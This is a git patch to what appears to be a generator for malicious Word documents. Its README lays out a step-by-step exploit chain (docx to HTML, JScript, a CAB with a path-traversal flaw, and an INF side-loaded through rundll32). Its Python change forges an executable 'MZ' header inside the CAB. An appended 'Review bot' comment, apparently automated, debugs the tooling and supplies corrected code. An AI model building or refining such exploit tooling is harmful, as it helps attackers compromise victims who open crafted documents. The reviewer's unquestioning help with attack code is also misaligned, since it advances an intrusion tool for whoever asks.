From 53af9514ef8c5f477b06d5b26104f5d53076269c Mon Sep 17 00:00:00 2001
From: d3adc0de
Date: Wed, 15 Sep 2021 23:53:37 +0100
Subject: [PATCH] Minor Edit in Cab Parser
---
 README.md     | 18 +++++++++---------
 cab_parser.py | 10 +++++++++-
 2 files changed, 18 insertions(+), 10 deletions(-)
diff --git a/README.md b/README.md
index 1cdc2be..4f16404 100644
--- a/README.md
+++ b/README.md
@@ -14,15 +14,15 @@ So far, the only valuable resources I've seen to create a fully working generato
 The above resources outline a lot of the requirements needed to create a full chain. As I do not desire
-### Chain
-* Docx opened
-* Relationship stored in document.xml.rels points to malicious html
-* IE preview is launched to open the HTML link
-* JScript within the HTML contains an object pointing to a CAB file, and an iframe pointing to an INF file,
- prefixed with the ".cpl:" directive
-* The cab file is opened, the INF file stored in the %TEMP%\Low directory
-* Due to a Path traversal (ZipSlip) vulnerability in the CAB, it's possible to store the INF in %TEMP%
-* Then, the INF file is opened with the ".cpl:" directive, causing the side-loading of the INF file via rundll32
+### Exploit Chain
+1. Docx opened
+2. Relationship stored in document.xml.rels points to malicious html
+3. IE preview is launched to open the HTML link
+4. JScript within the HTML contains an object pointing to a CAB file, and an iframe pointing to an INF file,
+ prefixed with the ".cpl:" directive
+5. The cab file is opened, the INF file stored in the %TEMP%\Low directory
+6. Due to a Path traversal (ZipSlip) vulnerability in the CAB, it's possible to store the INF in %TEMP%
+7. Then, the INF file is opened with the ".cpl:" directive, causing the side-loading of the INF file via rundll32 (if this is a DLL)
 ### Overlooked Requirements
diff --git a/cab_parser.py b/cab_parser.py
index 474d83e..e267161 100644
--- a/cab_parser.py
+++ b/cab_parser.py
@@ -200,10 +200,18 @@ def parse(file):
     data = open(file, "rb").read()
     cab = Cab(data=data)
     print(cab.to_string())
+
+
+def change_e_magic(cab: Cab, value: bytes):
+    if not value or not isinstance(value, bytes) or len(value) != 4:
+        return
     new_cab = cab.change_bytes(offset=0x58, size=4, value=b"MZ\x90\x00")
     print(Cab(new_cab).to_string())
+
+
+def save(cab: Cab, file: str):
     with open(file, "wb") as out:
-        out.write(Cab(new_cab).to_bytes())
+        out.write(cab.to_bytes())
 
 
 if __name__ == "__main__":
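Review bot: In the new change_e_magic the validated `value` parameter is never used — the unchanged context line still passes the hard-coded `b"MZ\x90\x00"` to change_bytes — and the modified CAB is only printed, never returned, so after the split a caller has no object to hand to save(). The minimal fix is `new_cab = cab.change_bytes(offset=0x58, size=4, value=value)` followed by `return Cab(new_cab)` after the print, and replacing the silent `return` on a bad argument with `raise ValueError("value must be exactly 4 bytes")` so a malformed input is reported instead of ignored. Whether change_bytes returns raw bytes or a Cab is inferred from the `Cab(new_cab)` wrapping; its definition is outside this hunk. A one-line docstring on each new function stating that `offset=0x58` is the location of the patched 4-byte magic would also help, since the constant is otherwise unexplained.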